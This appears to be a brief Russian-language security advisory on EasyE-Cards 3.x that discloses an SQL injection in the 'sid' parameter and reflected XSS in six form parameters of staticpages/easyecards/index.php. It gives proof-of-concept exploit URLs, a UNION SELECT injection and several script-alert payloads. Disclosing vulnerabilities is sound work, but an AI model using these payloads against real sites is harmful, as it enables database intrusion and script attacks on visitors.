Программа: EasyE-Cards 3.x

Уязвимость позволяет удаленному пользователю осуществить XSS нападение и
выполнить произвольные SQL команды в базе данных приложения.

1) Уязвимость существует из-за недостаточной обработки входных данных в
параметре "sid" сценарием staticpages/easyecards/index.php. Удаленный
пользователь может с помощью специально сформированного запроса выполнить
произвольные SQL команды в базе данных приложения.

Эксплоит:

http://Example/index.php?show=pickup&sid=
99999'+union+select+0,1,2,3,4,5,6,7,8,9,10,11,12,13/*

2) Уязвимость существует из-за недостаточной обработки входных данных в
параметрах "ResultHtml", "dir", "SenderName", "RecipientName", "SenderMail", и "RecipientMail"
сценарием staticpages/easyecards/index.php. Атакующий может выполнить
произвольный сценарий в браузере жертвы в контексте безопасности уязвимого
сайта.

Эксплоит:

Xss 1 : http://Example/?ResultHtml=<script>alert('xss')</script>

Xss 2 : http://Example/index.php?step=2&dir=<>>>>''"<script>alert('xss')</script>

Xss 3 : http://Example/index.php?step=2&SenderName=<>>>>''"<script>alert('xss')</script>

Xss 4 : http://Example/index.php?step=2&RecipientName=%3C%3E%3E%3E%3E%27%27%22%3Cscript%3Ealert(%27xss%27)%3C/script%3E

Xss 5 : http://Example/index.php?step=2&SenderMail=<>>>>''"<script>alert('xss')</script>

Xss 6 : http://Example/index.php?step=2&RecipientMail=%3C%3E%3E%3E%3E%27%27%22%3Cscript%3Ealert(%27xss%27)%3C/script%3E

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии